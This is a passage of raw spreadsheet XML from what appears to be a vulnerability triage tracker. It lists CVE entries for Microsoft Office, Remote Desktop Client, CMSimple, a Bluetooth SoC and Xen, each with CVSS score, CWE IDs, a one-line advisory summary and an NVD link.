s="5" t="inlineStr" /><c r="R227" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S227" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t></is></c></row><row r="228"><c r="A228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C228" s="5" t="inlineStr"><is><t>CVE-2026-78463</t></is></c><c r="D228" s="5" t="n"><v>8.800000000000001</v></c><c r="E228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G228" s="5" t="inlineStr" /><c r="H228" s="5" t="n"><v>0.008999999999999999</v></c><c r="I228" s="5" t="inlineStr" /><c r="J228" s="5" t="inlineStr" /><c r="K228" s="5" t="inlineStr" /><c r="L228" s="5" t="inlineStr" /><c r="M228" s="5" t="inlineStr" /><c r="N228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q228" s="5" t="inlineStr" /><c r="R228" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S228" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t></is></c></row><row r="229"><c r="A229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C229" s="5" t="inlineStr"><is><t>CVE-2026-78504</t></is></c><c r="D229" s="5" t="n"><v>8.800000000000001</v></c><c r="E229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G229" s="5" t="inlineStr" /><c r="H229" s="5" t="n"><v>0.006</v></c><c r="I229" s="5" t="inlineStr" /><c r="J229" s="5" t="inlineStr" /><c r="K229" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L229" s="5" t="inlineStr" /><c r="M229" s="5" t="inlineStr" /><c r="N229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P229" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q229" s="5" t="inlineStr" /><c r="R229" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S229" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t></is></c></row><row r="230"><c r="A230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C230" s="5" t="inlineStr"><is><t>CVE-2026-78505</t></is></c><c r="D230" s="5" t="n"><v>8.800000000000001</v></c><c r="E230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G230" s="5" t="inlineStr" /><c r="H230" s="5" t="n"><v>0.008</v></c><c r="I230" s="5" t="inlineStr" /><c r="J230" s="5" t="inlineStr" /><c r="K230" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L230" s="5" t="inlineStr" /><c r="M230" s="5" t="inlineStr" /><c r="N230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P230" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q230" s="5" t="inlineStr" /><c r="R230" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S230" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t></is></c></row><row r="231"><c r="A231" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C231" s="5" t="inlineStr"><is><t>CVE-2026-78507</t></is></c><c r="D231" s="5" t="n"><v>8.800000000000001</v></c><c r="E231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F231" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G231" s="5" t="inlineStr" /><c r="H231" s="5" t="n"><v>0.006</v></c><c r="I231" s="5" t="inlineStr" /><c r="J231" s="5" t="inlineStr" /><c r="K231" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L231" s="5" t="inlineStr" /><c r="M231" s="5" t="inlineStr" /><c r="N231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q231" s="5" t="inlineStr" /><c r="R231" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S231" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t></is></c></row><row r="232"><c r="A232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C232" s="5" t="inlineStr"><is><t>CVE-2026-78511</t></is></c><c r="D232" s="5" t="n"><v>8.800000000000001</v></c><c r="E232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F232" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G232" s="5" t="inlineStr" /><c r="H232" s="5" t="n"><v>0.008</v></c><c r="I232" s="5" t="inlineStr" /><c r="J232" s="5" t="inlineStr" /><c r="K232" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L232" s="5" t="inlineStr" /><c r="M232" s="5" t="inlineStr" /><c r="N232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q232" s="5" t="inlineStr" /><c r="R232" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S232" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t></is></c></row><row r="233"><c r="A233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C233" s="5" t="inlineStr"><is><t>CVE-2026-78512</t></is></c><c r="D233" s="5" t="n"><v>8.800000000000001</v></c><c r="E233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F233" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G233" s="5" t="inlineStr" /><c r="H233" s="5" t="n"><v>0.008</v></c><c r="I233" s="5" t="inlineStr" /><c r="J233" s="5" t="inlineStr" /><c r="K233" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L233" s="5" t="inlineStr" /><c r="M233" s="5" t="inlineStr" /><c r="N233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P233" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q233" s="5" t="inlineStr" /><c r="R233" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S233" s="5" t="inlineStr"><is><t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t></is></c></row><row r="234"><c r="A234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C234" s="5" t="inlineStr"><is><t>CVE-2026-78514</t></is></c><c r="D234" s="5" t="n"><v>8.800000000000001</v></c><c r="E234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F234" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G234" s="5" t="inlineStr" /><c r="H234" s="5" t="n"><v>0.006</v></c><c r="I234" s="5" t="inlineStr" /><c r="J234" s="5" t="inlineStr" /><c r="K234" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L234" s="5" t="inlineStr" /><c r="M234" s="5" t="inlineStr" /><c r="N234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P234" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q234" s="5" t="inlineStr" /><c r="R234" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S234" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t></is></c></row><row r="235"><c r="A235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C235" s="5" t="inlineStr"><is><t>CVE-2026-78517</t></is></c><c r="D235" s="5" t="n"><v>8.800000000000001</v></c><c r="E235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F235" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G235" s="5" t="inlineStr" /><c r="H235" s="5" t="n"><v>0.006</v></c><c r="I235" s="5" t="inlineStr" /><c r="J235" s="5" t="inlineStr" /><c r="K235" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L235" s="5" t="inlineStr" /><c r="M235" s="5" t="inlineStr" /><c r="N235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P235" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q235" s="5" t="inlineStr" /><c r="R235" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S235" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t></is></c></row><row r="236"><c r="A236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C236" s="5" t="inlineStr"><is><t>CVE-2026-78518</t></is></c><c r="D236" s="5" t="n"><v>8.800000000000001</v></c><c r="E236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F236" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G236" s="5" t="inlineStr" /><c r="H236" s="5" t="n"><v>0.008999999999999999</v></c><c r="I236" s="5" t="inlineStr" /><c r="J236" s="5" t="inlineStr" /><c r="K236" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L236" s="5" t="inlineStr" /><c r="M236" s="5" t="inlineStr" /><c r="N236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P236" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q236" s="5" t="inlineStr" /><c r="R236" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S236" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t></is></c></row><row r="237"><c r="A237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C237" s="5" t="inlineStr"><is><t>CVE-2026-78519</t></is></c><c r="D237" s="5" t="n"><v>8.800000000000001</v></c><c r="E237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F237" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G237" s="5" t="inlineStr" /><c r="H237" s="5" t="n"><v>0.006</v></c><c r="I237" s="5" t="inlineStr" /><c r="J237" s="5" t="inlineStr" /><c r="K237" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L237" s="5" t="inlineStr" /><c r="M237" s="5" t="inlineStr" /><c r="N237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P237" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q237" s="5" t="inlineStr" /><c r="R237" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S237" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t></is></c></row><row r="238"><c r="A238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C238" s="5" t="inlineStr"><is><t>CVE-2026-78521</t></is></c><c r="D238" s="5" t="n"><v>8.800000000000001</v></c><c r="E238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F238" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G238" s="5" t="inlineStr" /><c r="H238" s="5" t="n"><v>0.006</v></c><c r="I238" s="5" t="inlineStr" /><c r="J238" s="5" t="inlineStr" /><c r="K238" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L238" s="5" t="inlineStr" /><c r="M238" s="5" t="inlineStr" /><c r="N238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P238" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q238" s="5" t="inlineStr" /><c r="R238" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S238" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t></is></c></row><row r="239"><c r="A239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C239" s="5" t="inlineStr"><is><t>CVE-2026-78524</t></is></c><c r="D239" s="5" t="n"><v>8.800000000000001</v></c><c r="E239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F239" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G239" s="5" t="inlineStr" /><c r="H239" s="5" t="n"><v>0.008</v></c><c r="I239" s="5" t="inlineStr" /><c r="J239" s="5" t="inlineStr" /><c r="K239" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L239" s="5" t="inlineStr" /><c r="M239" s="5" t="inlineStr" /><c r="N239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P239" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q239" s="5" t="inlineStr" /><c r="R239" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S239" s="5" t="inlineStr"><is><t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t></is></c></row><row r="240"><c r="A240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C240" s="5" t="inlineStr"><is><t>CVE-2026-78525</t></is></c><c r="D240" s="5" t="n"><v>8.800000000000001</v></c><c r="E240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G240" s="5" t="inlineStr" /><c r="H240" s="5" t="n"><v>0.008</v></c><c r="I240" s="5" t="inlineStr" /><c r="J240" s="5" t="inlineStr" /><c r="K240" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L240" s="5" t="inlineStr" /><c r="M240" s="5" t="inlineStr" /><c r="N240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P240" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q240" s="5" t="inlineStr" /><c r="R240" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S240" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t></is></c></row><row r="241"><c r="A241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C241" s="5" t="inlineStr"><is><t>CVE-2026-78526</t></is></c><c r="D241" s="5" t="n"><v>8.800000000000001</v></c><c r="E241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G241" s="5" t="inlineStr" /><c r="H241" s="5" t="n"><v>0.006</v></c><c r="I241" s="5" t="inlineStr" /><c r="J241" s="5" t="inlineStr" /><c r="K241" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L241" s="5" t="inlineStr" /><c r="M241" s="5" t="inlineStr" /><c r="N241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P241" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q241" s="5" t="inlineStr" /><c r="R241" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S241" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t></is></c></row><row r="242"><c r="A242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C242" s="5" t="inlineStr"><is><t>CVE-2026-78834</t></is></c><c r="D242" s="5" t="n"><v>8.800000000000001</v></c><c r="E242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G242" s="5" t="inlineStr" /><c r="H242" s="5" t="n"><v>0.005</v></c><c r="I242" s="5" t="inlineStr" /><c r="J242" s="5" t="inlineStr" /><c r="K242" s="5" t="inlineStr" /><c r="L242" s="5" t="inlineStr" /><c r="M242" s="5" t="inlineStr" /><c r="N242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P242" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q242" s="5" t="inlineStr" /><c r="R242" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S242" s="5" t="inlineStr"><is><t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t></is></c><c r="T242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t></is></c></row><row r="243"><c r="A243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C243" s="5" t="inlineStr"><is><t>CVE-2026-79376</t></is></c><c r="D243" s="5" t="n"><v>8.800000000000001</v></c><c r="E243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F243" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G243" s="5" t="inlineStr" /><c r="H243" s="5" t="n"><v>0.002</v></c><c r="I243" s="5" t="inlineStr" /><c r="J243" s="5" t="inlineStr" /><c r="K243" s="5" t="inlineStr" /><c r="L243" s="5" t="inlineStr" /><c r="M243" s="5" t="inlineStr" /><c r="N243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P243" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q243" s="5" t="inlineStr" /><c r="R243" s="5" t="inlineStr"><is><t>CWE-1284, CWE-20</t></is></c><c r="S243" s="5" t="inlineStr"><is><t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t></is></c></row><row r="244"><c r="A244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C244" s="5" t="inlineStr"><is><t>CVE-2026-79602</t></is></c><c r="D244" s="5" t="n"><v>8.800000000000001</v></c><c r="E244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F244" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G244" s="5" t="inlineStr" /><c r="H244" s="5" t="n"><v>0.001</v></c><c r="I244" s="5" t="inlineStr" /><c r="J244" s="5" t="inlineStr" /><c r="K244" s="5" t="inlineStr" /><c r="L244" s="5" t="inlineStr" /><c r="M244" s="5" t="inlineStr" /><c r="N244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P244" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q244" s="5" t="inlineStr" /><c r="R244" s="5" t="inlineStr"><is><t>CWE-119</t></is></c><c r="S244" s="5" t="inlineStr"><is><t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t></is></c><c r="T244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t></is></c></row><row r="245"><c r="A245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C245" s="5" t="inlineStr"><is><t>CVE-2026-80074</t></is></c><c r="D245" s="5" t="n"><v>8.800000000000001</v></c><c r="E245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G245" s="5" t="inlineStr" /><c r="H245" s="5" t="n"><v>0.006</v></c><c r="I245" s="5" t="inlineStr" /><c r="J245" s="5" t="inlineStr" /><c r="K245" s="5" t="inlineStr" /><c r="L245" s="5" t="inlineStr" /><c r="M245" s="5" t="inlineStr" /><c r="N245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P245" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q245" s="5" t="inlineStr" /><c r="R245" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S245" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t></is></c></row><row r="246"><c r="A246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C246" s="5" t="inlineStr"><is><t>CVE-2026-80077</t></is></c><c r="D246" s="5" t="n"><v>8.800000000000001</v></c><c r="E246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G246" s="5" t="inlineStr" /><c r="H246" s="5" t="n"><v>0.006</v></c><c r="I246" s="5" t="inlineStr" /><c r="J246" s="5" t="inlineStr" /><c r="K246" s="5" t="inlineStr" /><c r="L246" s="5" t="inlineStr" /><c r="M246" s="5" t="inlineStr" /><c r="N246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P246" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q246" s="5" t="inlineStr" /><c r="R246" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S246" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t></is></c></row><row r="247"><c r="A247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C247" s="5" t="inlineStr"><is><t>CVE-2026-80080</t></is></c><c r="D247" s="5" t="n"><v>8.800000000000001</v></c><c r="E247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G247" s="5" t="inlineStr" /><c r="H247" s="5" t="n"><v>0.006</v></c><c r="I247" s="5" t="inlineStr" /><c r="J247" s="5" t="inlineStr" /><c r="K247" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L247" s="5" t="inlineStr" /><c r="M247" s="5" t="inlineStr" /><c r="N247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P247" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q247" s="5" t="inlineStr" /><c r="R247" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S247" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t></is></c></row><row r="248"><c r="A248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C248" s="5" t="inlineStr"><is><t>CVE-2026-80081</t></is></c><c r="D248" s="5" t="n"><v>8.800000000000001</v></c><c r="E248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G248" s="5" t="inlineStr" /><c r="H248" s="5" t="n"><v>0.005</v></c><c r="I248" s="5" t="inlineStr" /><c r="J248" s="5" t="inlineStr" /><c r="K248" s="5" t="inlineStr"><is><t>microsoft:365_apps</t></is></c><c r="L248" s="5" t="inlineStr" /><c r="M248" s="5" t="inlineStr" /><c r="N248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P248" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q248" s="5" t="inlineStr" /><c r="R248" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S248" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t></is></c></row><row r="249"><c 